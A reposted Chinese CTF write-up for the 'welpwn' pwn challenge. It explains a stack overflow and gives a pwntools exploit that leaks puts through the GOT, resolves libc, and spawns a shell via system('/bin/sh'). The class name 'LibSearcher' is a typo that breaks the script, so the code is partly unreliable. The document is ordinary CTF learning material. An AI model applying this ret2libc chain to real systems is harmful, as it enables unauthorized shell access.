标签：p64 puts libc welpwn 函数 pwn con addr

1.题目

1.保护机制

开启nx

2.关键代码

主函数

echo函数

2.思路

重点1：可以看到栈溢出漏洞，但是echo函数代码显然限制了ROP链中有\x00的出现，但是我们发现echo函数栈非常小，导出我们溢出可以溢出到主函数的buf缓冲区中，而且主函数的buf是不受\x00影响的，所以我们先使用pop覆盖echo函数的返回值，然后在主函数的buf中执行shellcode
重点2：这次试用了LibcSearcher库来完成函数地址泄漏

from pwn import *
from ctypes import *
from LibcSearcher import *

context(arch="amd64",os="linux",log_level="debug")
#con = remote('111.200.241.244',59105)
con = process('./pwn')
elf = ELF('./pwn')

pop_rdi = 0x4008a3
puts_plt = elf.plt['puts']
pop4 = 0x40089c
puts_got = elf.got['puts']
start_addr = 0x400630

payload = "A"*24 + p64(pop4) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(start_addr)
con.recvuntil("RCTF\n")
con.send(payload)
con.recvuntil("\x40")
puts_addr = u64(con.recv(6).ljust(8,'\x00'))

libc = LibSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

con.recvuntil('RCTF\n')
payload = "A"*24 + p64(pop4) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
con.send(payload)
con.interactive()

标签：p64,puts,libc,welpwn,函数,pwn,con,addr
来源： https://blog.csdn.net/qq_43647628/article/details/120190365

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。